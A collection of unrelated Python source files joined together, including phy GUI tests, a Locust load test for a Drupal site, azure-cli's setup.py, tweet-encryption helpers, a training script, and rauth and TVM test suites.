def test_common_05(self):
"""Select a similar cluster."""
self.next()
self.assertEqual(len(self.selected), 2)
def test_common_06(self):
"""Undo/redo the merge several times."""
for _ in range(3):
self.undo()
self.assertEqual(len(self.selected), 2)
self.redo()
self.assertEqual(len(self.selected), 2)
def test_common_07(self):
"""Move action."""
self.move('similar_to_noise')
self.assertEqual(len(self.selected), 2)
def test_common_08(self):
"""Move action."""
self.move('best_to_good')
self.assertEqual(len(self.selected), 1)
def test_common_09(self):
"""Label action."""
self.next()
@connect(sender=self.supervisor)
def on_cluster(sender, up):
cls = self.__class__
cls._label_name, cls._label_value = 'new_label', up.metadata_value
self.label('new_label', 3)
unconnect(on_cluster)
def test_common_10(self):
self.supervisor.save()
def test_common_11(self):
s = self.controller.selection
self.assertEqual(s.cluster_ids, self.selected)
self.gui.view_actions.toggle_spike_reorder(True)
self.gui.view_actions.switch_raw_data_filter()
class GlobalViewsTests(object):
def test_global_filter_1(self):
self.next()
cv = self.supervisor.cluster_view
emit('table_filter', cv, self.cluster_ids[::2])
def test_global_sort_1(self):
cv = self.supervisor.cluster_view
emit('table_sort', cv, self.cluster_ids[::-1])
#------------------------------------------------------------------------------
# Mock test cases
#------------------------------------------------------------------------------
class MockControllerTests(MinimalControllerTests, GlobalViewsTests, unittest.TestCase):
"""Empty mock controller."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyController)
def test_create_ipython_view(self):
self.gui.create_and_add_view('IPythonView')
def test_create_raster_view(self):
view = self.gui.create_and_add_view('RasterView')
mouse_click(self.qtbot, view.canvas, (10, 10), modifiers=('Control',))
view.actions.next_color_scheme()
class MockControllerWTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with waveforms."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerW)
@property
def waveform_view(self):
return self.gui.list_views(WaveformView)[0]
def test_waveform_view(self):
self.waveform_view.actions.toggle_mean_waveforms(True)
self.waveform_view.actions.next_waveforms_type()
self.waveform_view.actions.change_n_spikes_waveforms(200)
def test_mean_amplitudes(self):
self.next()
self.assertTrue(self.controller.get_mean_spike_raw_amplitudes(self.selected[0]) >= 0)
def test_waveform_select_channel(self):
self.amplitude_view.amplitudes_type = 'raw'
fv = self.waveform_view
# Select channel in waveform view.
w, h = fv.canvas.get_size()
w, h = w / 2, h / 2
x, y = w / 2, h / 2
mouse_click(self.qtbot, fv.canvas, (x, y), button='Left', modifiers=('Control',))
class MockControllerFTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with features."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerF)
@property
def feature_view(self):
return self.gui.list_views(FeatureView)[0]
def test_feature_view_split(self):
self.next()
n = max(self.cluster_ids)
self.lasso(self.feature_view, .1)
self.split()
# Split one cluster => Two new clusters should be selected after the split.
self.assertEqual(self.selected[:2], [n + 1, n + 2])
def test_feature_view_toggle_spike_reorder(self):
self.gui.view_actions.toggle_spike_reorder(True)
def test_select_feature(self):
self.next()
fv = self.feature_view
# Select feature in feature view.
w, h = fv.canvas.get_size()
w, h = w / 4, h / 4
x, y = w / 2, h / 2
mouse_click(self.qtbot, fv.canvas, (x, y), button='Right', modifiers=('Alt',))
class MockControllerTTests(GlobalViewsTests, MinimalControllerTests, unittest.TestCase):
"""Mock controller with traces."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerT)
@property
def trace_view(self):
return self.gui.list_views(TraceView)[0]
def test_trace_view(self):
self.trace_view.actions.go_to_next_spike()
self.trace_view.actions.go_to_previous_spike()
self.trace_view.actions.toggle_highlighted_spikes(True)
mouse_click(self.qtbot, self.trace_view.canvas, (100, 100), modifiers=('Control',))
mouse_click(self.qtbot, self.trace_view.canvas, (150, 100), modifiers=('Shift',))
emit('select_time', self, 0)
self.trace_view.actions.next_color_scheme()
class MockControllerTmpTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with templates."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerTmp)
@property
def template_view(self):
return self.gui.list_views(TemplateView)[0]
def test_template_view_select(self):
mouse_click(self.qtbot, self.template_view.canvas, (100, 100), modifiers=('Control',))
mouse_click(self.qtbot, self.template_view.canvas, (150, 100), modifiers=('Shift',))
def test_mean_amplitudes(self):
self.next()
self.assertTrue(self.controller.get_mean_spike_template_amplitudes(self.selected[0]) >= 0)
def test_split_template_amplitude(self):
self.next()
self.amplitude_view.amplitudes_type = 'template'
self.controller.get_amplitudes(self.selected[0], load_all=True)
self.amplitude_view.plot()
self.lasso(self.amplitude_view)
self.split()
class MockControllerFullTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with all views."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerFull)
def test_filter(self):
rdf = self.controller.raw_data_filter
@rdf.add_filter
def diff(arr, axis=0): # pragma: no cover
out = np.zeros_like(arr)
if axis == 0:
out[1:, ...] = np.diff(arr, axis=axis)
elif axis == 1:
out[:, 1:, ...] = np.diff(arr, axis=axis)
return out
self.gui.view_actions.switch_raw_data_filter()
self.gui.view_actions.switch_raw_data_filter()
rdf.set('diff')
assert rdf.current == 'diff'
def test_y1_close_view(self):
s = self.selected
self.next_best()
assert s != self.selected
fv = self.gui.get_view(FeatureView)
wv = self.gui.get_view(WaveformView)
assert self.selected == wv.cluster_ids
fv.dock.close()
s = self.selected
self.next_best()
assert s != self.selected
assert self.selected == wv.cluster_ids
def test_z1_close_all_views(self):
self.next()
for view in self.gui.views:
view.dock.close()
self.qtbot.wait(200)
def test_z2_open_all_views(self):
for view_cls in self.controller.view_creator.keys():
self.gui.create_and_add_view(view_cls)
self.qtbot.wait(200)
def test_z3_select(self):
self.next()
self.next()
def test_z4_open_new_views(self):
for view_cls in self.controller.view_creator.keys():
self.gui.create_and_add_view(view_cls)
self.qtbot.wait(200)
def test_z5_select(self):
self.next_best()
self.next()
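# Hedged note rather than project documentation: these unittest.TestCase classes
# can normally be collected with pytest, e.g. `python -m pytest <this file> -x`,
# provided a Qt binding and the phy/phylib test dependencies are installed
# (the suite opens real GUI windows while it runs).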
|
from __future__ import annotations
from typing import TYPE_CHECKING
from datetime import datetime
from .hypyobject import HypyObject
from .uuid import UUID
from .hypixelplayer import HypixelPlayer
if TYPE_CHECKING:
from .player import Player
from .hypixelfriends import HypixelFriends
class HypixelFriend(HypyObject, HypixelPlayer):
"""A Hypixel Friend"""
__slots__ = ("_raw", "_hypy", "_id")
def __init__(self, raw, of, _hypy) -> None:
self._raw: dict = raw
self._hypy = _hypy
self.of = of
self._id = self._raw["_id"]
self.uuid = UUID(
self._raw["uuidReceiver"]
if of.no_dashes == self._raw["uuidSender"]
else self._raw["uuidSender"]
)
@property
def since(self) -> datetime:
"""Since when the friendship exists"""
return datetime.utcfromtimestamp(self._raw["started"] / 1000)
|
import sys
from CLI.app import run
def main():
run()
if __name__ == "__main__":
sys.exit(main() or 0)
|
from locust import HttpLocust, TaskSet, between
from bs4 import BeautifulSoup
from faker import Faker
import random, time
USER_CREDENTIALS = [
("thomaswolf", "thomaswolf"),
("susanwilliams", "susanwilliams"),
("student_01", "student_01"),
("shaunberkley", "shaunberkley"),
("robertandrews", "robertandrews"),
("petershaw", "petershaw"),
("paulharris", "paulharris"),
("michelleclark", "michelleclark"),
("ironman", "ironman"),
("EAA_official", "EAA_official"),
("chrishall", "chrishall"),
("alisonhendrix", "alisonhendrix"),
]
def is_static_file(f):
if "/sites/default/files" in f:
return True
else:
return False
def fetch_static_assets(session, response):
resource_urls = set()
soup = BeautifulSoup(response.text, "html.parser")
# Look through the page markup to find static assets that can be fetched.
for res in soup.find_all(src=True):
url = res['src']
if is_static_file(url):
resource_urls.add(url)
for url in set(resource_urls):
# Retrieve static files.
session.client.get(url, name="(Static File)")
def index(self):
# Go to the homepage and fetch static assets.
response = self.client.get("/")
fetch_static_assets(self, response)
def about(self):
# Go to the about page and fetch static assets.
response = self.client.get("/about")
fetch_static_assets(self, response)
def createTopic(self):
# Go to the add topic page and fetch static assets.
response = self.client.get("/node/add/topic")
fetch_static_assets(self, response)
# Find the Drupal form build id and token.
content = BeautifulSoup(response.content, "html.parser")
build_id = content.body.find('input', {'name': 'form_build_id'})['value']
form_token = content.body.find('input', {'data-drupal-selector': 'edit-node-topic-form-form-token'})['value']
# Submit the form.
fake = Faker()
response = self.client.post("/node/add/topic", {
"title[0][value]": fake.sentence(),
"body[0][value]": fake.text(),
"field_topic_type": 1,
"groups": "_none",
"field_content_visibility": "community",
"field_topic_comments[0][status]": 2,
"status[value]": 1,
"form_build_id": build_id,
"form_token": form_token,
"form_id": "node_topic_form",
"op": "Save"
})
fetch_static_assets(self, response)
def drupalLogin(self):
# Get a random user to login with.
username, password = random.choice(USER_CREDENTIALS)
# Go to the user login page and fetch static assets.
response = self.client.get("/user/login")
fetch_static_assets(self, response)
# Find the Drupal form build id.
content = BeautifulSoup(response.content, "html.parser")
build_id = content.body.find('input', {'name': 'form_build_id'})['value']
# Submit the login form.
response = self.client.post("/user/login", {
"name_or_mail": username,
"pass": password,
"form_id": "social_user_login_form",
"form_build_id": build_id,
"op": "Log in"
})
fetch_static_assets(self, response)
def drupalLogout(self):
# Go to the logout page and fetch static assets.
response = self.client.get("/user/logout")
fetch_static_assets(self, response)
class UserBehavior(TaskSet):
# Switch randomly between different tasks.
tasks = {index: 1, about: 1, createTopic: 1}
def on_start(self):
drupalLogin(self)
def on_stop(self):
drupalLogout(self)
class WebsiteUser(HttpLocust):
task_set = UserBehavior
wait_time = between(5.0, 9.0)
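# Hedged usage note (file name and host below are placeholders): a script built
# on this older HttpLocust/TaskSet API is typically launched with
#   locust -f loadtest.py --host=https://example.com
# and then driven from the Locust web UI at http://localhost:8089.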
|
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
from codecs import open
from setuptools import setup
try:
from azure_bdist_wheel import cmdclass
except ImportError:
from distutils import log as logger
logger.warn("Wheel is not available, disabling bdist_wheel hook")
cmdclass = {}
VERSION = "2.0.50"
# If we have source, validate that our version numbers match
# This should prevent uploading releases with mismatched versions.
try:
with open('azure/cli/core/__init__.py', 'r', encoding='utf-8') as f:
content = f.read()
except OSError:
pass
else:
import re
import sys
m = re.search(r'__version__\s*=\s*[\'"](.+?)[\'"]', content)
if not m:
print('Could not find __version__ in azure/cli/core/__init__.py')
sys.exit(1)
if m.group(1) != VERSION:
print('Expected __version__ = "{}"; found "{}"'.format(VERSION, m.group(1)))
sys.exit(1)
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
]
# TODO These dependencies should be updated to reflect only what this package needs
DEPENDENCIES = [
'adal>=1.2.0',
'argcomplete>=1.8.0',
'azure-cli-telemetry',
'colorama>=0.3.9',
'humanfriendly>=4.7',
'jmespath',
'knack==0.4.5',
'msrest>=0.4.4',
'msrestazure>=0.4.25',
'paramiko>=2.0.8',
'pip',
'pygments',
'PyJWT',
'pyopenssl>=17.1.0', # https://github.com/pyca/pyopenssl/pull/612
'pyyaml~=3.13',
'requests',
'six',
'tabulate>=0.7.7,<=0.8.2',
'wheel==0.30.0',
'azure-mgmt-resource==2.0.0'
]
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azure-cli-core',
version=VERSION,
description='Microsoft Azure Command-Line Tools Core Module',
long_description=README + '\n\n' + HISTORY,
license='MIT',
author='Microsoft Corporation',
author_email='azpycli@microsoft.com',
url='https://github.com/Azure/azure-cli',
zip_safe=False,
classifiers=CLASSIFIERS,
packages=[
'azure',
'azure.cli',
'azure.cli.core',
'azure.cli.core.commands',
'azure.cli.core.extension',
'azure.cli.core.profiles',
],
install_requires=DEPENDENCIES,
extras_require={
":python_version<'3.4'": ['enum34'],
":python_version<'2.7.9'": ['pyopenssl', 'ndg-httpsclient', 'pyasn1'],
":python_version<'3.0'": ['antlr4-python2-runtime'],
":python_version>='3.0'": ['antlr4-python3-runtime']
},
package_data={'azure.cli.core': ['auth_landing_pages/*.html']},
cmdclass=cmdclass
)
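# Hedged note: as with any setuptools project, this package can be installed in
# editable mode with `pip install -e .` from the directory containing this file,
# or built into distributable artifacts with `python setup.py sdist bdist_wheel`.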
|
from . import BaseModel
from busy_beaver.extensions import db
class GitHubSummaryUser(BaseModel):
"""GitHub Summary User table
TODO: GitHubSummaryUser should really be related to
GitHubSummaryConfiguration versus SlackInstallation
"""
__tablename__ = "github_summary_user"
def __repr__(self): # pragma: no cover
return f"<User slack: {self.slack_id} github: {self.github_username}>"
# Attributes
installation_id = db.Column(
db.Integer,
db.ForeignKey("slack_installation.id", name="fk_installation_id"),
nullable=False,
)
slack_id = db.Column(db.String(300), nullable=False)
github_id = db.Column(db.String(300), nullable=True)
github_username = db.Column(db.String(300), nullable=True)
github_state = db.Column(db.String(36), nullable=True)
github_access_token = db.Column(db.String(100), nullable=True)
# Relationships
installation = db.relationship(
"SlackInstallation", back_populates="github_summary_users"
)
class GitHubSummaryConfiguration(BaseModel):
__tablename__ = "github_summary_configuration"
def __repr__(self): # pragma: no cover
return f"<GitHubSummaryConfiguration>"
installation_id = db.Column(
db.Integer,
db.ForeignKey("slack_installation.id", name="fk_installation_id"),
nullable=False,
)
channel = db.Column(db.String(20), nullable=False)
time_to_post = db.Column(db.String(20), nullable=True)
timezone_info = db.Column(db.JSON)
# Relationships
slack_installation = db.relationship(
"SlackInstallation", back_populates="github_summary_config"
)
|
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
from Crypto.Cipher import PKCS1_OAEP
import os
import json
import base65536
# Wrapper functions so that the underlying encoding library can be swapped out.
def ByteToString(x):
return base65536.encode(x)
def StrToByte(x):
return base65536.decode(x)
# Encrypt message, and return the AES key and nonce
def EncryptText(msg,key=None):
# Generate random key if none given
if key is None:
key = os.urandom(16)
aesCipher = AES.new(key, AES.MODE_EAX)
cipherText, authTag = aesCipher.encrypt_and_digest(msg.encode())
return cipherText,key,aesCipher.nonce
def RetweetKeyAndNonce(publicKey_target,key,nonce):
encryptor = PKCS1_OAEP.new(publicKey_target)
key_encrypted = encryptor.encrypt(key)
nonce_encrypted = encryptor.encrypt(nonce)
return key_encrypted,nonce_encrypted
# Returns privateKey,publicKey from a PEM file
def LoadKeyPairPEM(path='./personalKey.pem'):
f = open(path,'r')
key = RSA.import_key(f.read())
return key.exportKey(),key.publickey().exportKey()
def LoadTargetJSON(path='./targetKeys.json'):
with open(path) as json_file:
data = json.load(json_file)
return data
def DecryptRetweet(rt,personalKey):
key_encrypted = rt.split(' ')[1]
nonce_encrypted = rt.split(' ')[-1]
decryptor = PKCS1_OAEP.new(personalKey)
key = decryptor.decrypt(bytes(StrToByte(key_encrypted)))
nonce = decryptor.decrypt(bytes(StrToByte(nonce_encrypted)))
return key,nonce
def DecryptTweet(twt,rtwt,personalKey):
key,nonce = DecryptRetweet(rtwt,personalKey)
aesCipher = AES.new(key,AES.MODE_EAX,nonce=nonce)
text = aesCipher.decrypt(StrToByte(twt))
return text
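# A minimal round-trip sketch (an illustration added here, not part of the
# original module): it generates a throw-away RSA key pair in memory instead of
# loading the PEM/JSON files above, encrypts a message, wraps the AES key and
# nonce for the recipient, and decrypts everything again. The "RT" prefix only
# exists so the space-separated layout expected by DecryptRetweet() holds.
if __name__ == '__main__':
    me = RSA.generate(2048)  # recipient's key pair, kept in memory
    cipher_text, aes_key, nonce = EncryptText('hello world')
    key_enc, nonce_enc = RetweetKeyAndNonce(me.publickey(), aes_key, nonce)
    tweet = ByteToString(cipher_text)
    retweet = ' '.join(['RT', ByteToString(key_enc), ByteToString(nonce_enc)])
    # Should print the original plaintext: 'hello world'
    print(DecryptTweet(tweet, retweet, me).decode())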
|
# Generated by Django 2.2.4 on 2019-11-23 05:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0002_posts'),
]
operations = [
migrations.RenameModel(
old_name='Posts',
new_name='Post',
),
]
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import _init_paths
import os
import torch
import torch.utils.data
from opts import opts
from models.model import create_model, load_model, save_model
from models.data_parallel import DataParallel
from logger import Logger
from datasets.dataset_factory import get_dataset
from trains.train_factory import train_factory
from mrc_utils.preprocess import process
def main(opt):
torch.manual_seed(opt.seed)
torch.backends.cudnn.benchmark = not opt.not_cuda_benchmark and not opt.test
Dataset = get_dataset(opt.dataset, opt.task)
opt = opts().update_dataset_info_and_set_heads(opt, Dataset)
print(opt)
logger = Logger(opt)
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
opt.device = torch.device('cuda' if opt.gpus[0] >= 0 else 'cpu')
print('Preprocessing data...')
mean, var = process(opt)
Dataset.mean = mean
Dataset.var = var
print('Creating model...')
model = create_model(opt.arch, opt.heads, opt.head_conv)
optimizer = torch.optim.Adam(model.parameters(), opt.lr)
start_epoch = 0
if opt.load_model != '':
model, optimizer, start_epoch = load_model(
model, opt.load_model, optimizer, opt.resume, opt.lr, opt.lr_step)
Trainer = train_factory[opt.task]
trainer = Trainer(opt, model, optimizer)
trainer.set_device(opt.gpus, opt.chunk_sizes, opt.device)
print('Setting up data...')
val_loader = torch.utils.data.DataLoader(
Dataset(opt, 'val'),
batch_size=1,
shuffle=False,
num_workers=1,
pin_memory=True
)
if opt.test:
_, preds = trainer.val(0, val_loader)
val_loader.dataset.run_eval(preds, opt.save_dir)
return
train_loader = torch.utils.data.DataLoader(
Dataset(opt, 'train'),
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True,
drop_last=True
)
print('Starting training...')
best = 1e10
for epoch in range(start_epoch + 1, opt.num_epochs + 1):
mark = epoch if opt.save_all else 'last'
log_dict_train, _ = trainer.train(epoch, train_loader)
logger.write('epoch: {} |'.format(epoch))
for k, v in log_dict_train.items():
logger.scalar_summary('train_{}'.format(k), v, epoch)
logger.write('{} {:8f} | '.format(k, v))
if opt.val_intervals > 0 and epoch % opt.val_intervals == 0:
save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(mark)),
epoch, model, optimizer)
with torch.no_grad():
log_dict_val, preds = trainer.val(epoch, val_loader)
for k, v in log_dict_val.items():
logger.scalar_summary('val_{}'.format(k), v, epoch)
logger.write('{} {:8f} | '.format(k, v))
if log_dict_val[opt.metric] < best:
best = log_dict_val[opt.metric]
save_model(os.path.join(opt.save_dir, 'model_best.pth'),
epoch, model)
else:
save_model(os.path.join(opt.save_dir, 'model_last.pth'),
epoch, model, optimizer)
logger.write('\n')
if epoch in opt.lr_step:
save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(epoch)),
epoch, model, optimizer)
lr = opt.lr * (0.1 ** (opt.lr_step.index(epoch) + 1))
print('Drop LR to', lr)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
logger.close()
if __name__ == '__main__':
opt = opts().parse()
main(opt)
|
# -*- coding: utf-8 -*-
'''
rauth.test_service_ofly
-----------------------
Test suite for rauth.service.OflyService.
'''
from base import RauthTestCase
from test_service import (FakeHexdigest, HttpMixin, MutableDatetime,
RequestMixin, ServiceMixin)
from rauth.compat import parse_qsl, urlsplit, is_basestring
from rauth.service import OflyService
from rauth.session import OFLY_DEFAULT_TIMEOUT, OflySession
from copy import deepcopy
from datetime import datetime
from functools import wraps
from mock import patch
import requests
import pickle
class OflyServiceTestCase(RauthTestCase, RequestMixin, ServiceMixin,
HttpMixin):
app_id = '000'
app_secret = '111'
user_id = '123'
def setUp(self):
RauthTestCase.setUp(self)
self.authorize_url = 'http://example.com/authorize'
self.base_url = 'http://example.com/api/'
self.service = OflyService(self.app_id,
self.app_secret,
name='service',
authorize_url=self.authorize_url,
base_url=self.base_url)
self.session = self.service.get_session(self.user_id)
# patch
self.session.request = self.fake_request
self.service.get_session = self.fake_get_session
def fake_get_sorted_params(self, params):
def sorting_gen():
for k in sorted(params.keys()):
yield '='.join((k, params[k]))
return '&'.join(sorting_gen())
def fake_sign(app_id, user_id):
def wrap(func):
@wraps(func)
@patch('rauth.session.datetime', MutableDatetime)
@patch('rauth.session.md5', FakeHexdigest)
@patch('rauth.session.sha1', FakeHexdigest)
def decorated(*args, **kwargs):
hash_meth = kwargs.get('hash_meth', 'sha1').upper()
ofly_params = {'oflyAppId': app_id,
'oflyHashMeth': hash_meth,
'oflyTimestamp': '1900-01-01T00:00:00.0Z',
'oflyApiSig': 'foo',
'oflyUserid': user_id}
MutableDatetime.utcnow = \
classmethod(lambda cls: datetime(1900, 1, 1))
return func(ofly_params=ofly_params, *args, **kwargs)
return decorated
return wrap
@patch.object(requests.Session, 'request')
@fake_sign(app_id, user_id)
def fake_request(self,
method,
url,
mock_request,
ofly_params,
user_id=None,
hash_meth='sha1',
**kwargs):
mock_request.return_value = self.response
user_id = user_id or self.service.user_id
service = OflyService(self.app_id,
self.app_secret,
name='service',
authorize_url=self.authorize_url,
base_url=self.base_url)
session = service.get_session(self.user_id)
r = session.request(method,
url,
user_id=user_id,
hash_meth=hash_meth,
**deepcopy(kwargs))
url = self.session._set_url(url)
kwargs.setdefault('params', {})
if is_basestring(kwargs['params']):
kwargs['params'] = dict(parse_qsl(kwargs['params']))
url_path = urlsplit(url).path
signature_base_string = self.service.app_secret + url_path + '?'
if len(kwargs['params']):
signature_base_string += \
self.fake_get_sorted_params(kwargs['params']) + '&'
signature_base_string += self.fake_get_sorted_params(ofly_params)
all_params = dict(tuple(ofly_params.items())
+ tuple(kwargs['params'].items()))
kwargs['params'] = self.fake_get_sorted_params(all_params)
if not isinstance(kwargs['params'], bytes):
kwargs['params'] = kwargs['params'].encode('utf-8')
mock_request.assert_called_with(method,
url,
timeout=OFLY_DEFAULT_TIMEOUT,
**kwargs)
return r
def fake_get_session(self, token):
return self.session
def test_get_session(self):
s = self.service.get_session('foo')
self.assertIsInstance(s, OflySession)
@fake_sign(app_id, user_id)
def test_get_authorize_url(self, ofly_params):
expected_url = 'http://example.com/authorize?'
ofly_params.pop('oflyUserid')
params = self.fake_get_sorted_params(ofly_params)
url = self.service.get_authorize_url()
self.assertEqual(url, expected_url + params)
def test_request_with_md5(self):
r = self.session.request('GET',
'http://example.com/',
user_id=self.user_id,
hash_meth='md5')
self.assert_ok(r)
def test_request_with_bad_hash_meth(self):
with self.assertRaises(TypeError) as e:
self.session.request('GET',
'http://example.com/',
user_id=self.user_id,
hash_meth='foo')
self.assertEqual(str(e.exception),
'hash_meth must be one of "sha1", "md5"')
def test_get_auth_session(self):
s = self.service.get_auth_session('foo')
self.assertIsInstance(s, OflySession)
def test_pickle_session(self):
session = pickle.loads(pickle.dumps(self.session))
# Add the fake request back to the session
session.request = self.fake_request
r = self.session.request('GET',
'http://example.com/',
user_id=self.user_id,
hash_meth='md5')
self.assert_ok(r)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import tvm
from tvm import relay
from tvm.relay import analysis
from tvm.relay.testing import run_opt_pass
def alpha_equal(x, y):
"""
Wrapper around alpha equality which ensures that
the hash function respects equality.
"""
return analysis.alpha_equal(x, y) and analysis.structural_hash(x) == analysis.structural_hash(y)
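# Illustrative examples (mirroring the constant test below, not part of the original file):
#   alpha_equal(relay.const(1), relay.const(1))  # True: alpha-equal with matching structural hash
#   alpha_equal(relay.const(1), relay.const(2))  # False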
def test_tensor_type_alpha_equal():
t1 = relay.TensorType((3, 4), "float32")
t2 = relay.TensorType((3, 4), "float32")
t3 = relay.TensorType((3, 4, 5), "float32")
assert t1 == t2
assert t1 != t3
t1 = relay.TensorType((), "float32")
t2 = relay.TensorType((), "float32")
assert t1 == t2
def test_incomplete_type_alpha_equal():
t1 = relay.IncompleteType(relay.TypeKind.ShapeVar)
t2 = relay.IncompleteType(relay.TypeKind.Type)
t3 = relay.IncompleteType(relay.TypeKind.Type)
# only equal when there is pointer equality
assert t2 == t2
assert t1 == t1
assert t1 != t2
assert t2 != t3
def test_type_param_alpha_equal():
t1 = relay.TypeVar("v1", relay.TypeKind.Type)
t2 = relay.TypeVar("v2", relay.TypeKind.ShapeVar)
t3 = relay.TypeVar("v3", relay.TypeKind.Type)
# only pointer equality and eq_map allow equal params
assert t1 == t1
assert t2 == t2
assert t1 != t2 # different kind
assert t1 != t3 # not in eq_map
# function types are the only way to put type params
# in eq map
ft1 = relay.FuncType(tvm.convert([]), t1, tvm.convert([t1]), tvm.convert([]))
ft2 = relay.FuncType(tvm.convert([]), t3, tvm.convert([t3]), tvm.convert([]))
# actually an invalid type because t2 is wrong kind
ft3 = relay.FuncType(tvm.convert([]), t2, tvm.convert([t2]), tvm.convert([]))
assert ft1 == ft2
assert ft1 != ft3 # kinds still do not match
def test_func_type_alpha_equal():
t1 = relay.TensorType((1, 2), "float32")
t2 = relay.TensorType((1, 2, 3), "float32")
tp1 = relay.TypeVar("v1", relay.TypeKind.Type)
tp2 = relay.TypeVar("v2", relay.TypeKind.Type)
tp3 = relay.TypeVar("v3", relay.TypeKind.ShapeVar)
tp4 = relay.TypeVar("v3", relay.TypeKind.ShapeVar)
broadcast = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Broadcast")
identity = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Identity")
tr1 = relay.TypeRelation(broadcast, tvm.convert([tp1, tp3]), 1, None)
tr2 = relay.TypeRelation(broadcast, tvm.convert([tp2, tp4]), 1, None)
tr3 = relay.TypeRelation(identity, tvm.convert([tp1, tp3]), 1, None)
ft = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1]))
translate_vars = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp2, tp4]),
tvm.convert([tr2]))
assert ft == translate_vars
different_args = relay.FuncType(tvm.convert([t1]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1]))
assert ft != different_args
different_order = relay.FuncType(tvm.convert([t2, t1]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1]))
assert ft != different_order
no_rel = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([]))
assert ft != no_rel
more_vars = relay.FuncType(tvm.convert([t1, t2]), tp2,
tvm.convert([tp1, tp2, tp3]),
tvm.convert([tr1]))
assert ft != more_vars
all_the_vars = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp2, tp3, tp4]),
tvm.convert([tr1, tr2]))
assert ft != all_the_vars
different_rel = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr3]))
assert ft != different_rel
more_rels = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1, tr3]))
assert ft != more_rels
def test_tuple_type_alpha_equal():
t1 = relay.TensorType((1, 2, 3), "float32")
t2 = relay.TensorType((1, 2, 3, 4), "float32")
tp1 = relay.TypeVar("v1", relay.TypeKind.Type)
tp2 = relay.TypeVar("v2", relay.TypeKind.Type)
tup1 = relay.TupleType(tvm.convert([t1, t2, tp1]))
tup2 = relay.TupleType(tvm.convert([t1, t2, tp1]))
tup3 = relay.TupleType(tvm.convert([t2, t1, tp1]))
tup4 = relay.TupleType(tvm.convert([t1, t2, tp2]))
# as long as types are alpha-equal and in same order,
# tuples should be alpha-equal
assert tup1 == tup2
assert tup1 != tup3
assert tup1 != tup4
def test_type_relation_alpha_equal():
t1 = relay.TensorType((1, 2), "float32")
t2 = relay.TensorType((1, 2, 3), "float32")
t3 = relay.TensorType((1, 2, 3, 4), "float32")
# functions are compared only by pointer equality so
# we need to be sure to use the same pointers
broadcast = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Broadcast")
identity = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Identity")
attr1 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr1_same = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr2 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4,4))
tr = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr1)
same = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr1)
diff_func = relay.TypeRelation(identity, tvm.convert([t1, t2]), 1, attr1)
diff_order = relay.TypeRelation(broadcast, tvm.convert([t2, t1]), 1, attr1)
diff_args = relay.TypeRelation(broadcast, tvm.convert([t2, t3]), 1, attr1)
diff_attr = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr2)
same_attr = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr1_same)
bigger = relay.TypeRelation(identity, tvm.convert([t1, t3, t2]), 2, attr1)
diff_num_inputs = relay.TypeRelation(identity, tvm.convert([t1, t3, t2]), 1, attr2)
# func, number of args, input count, and order should be the same
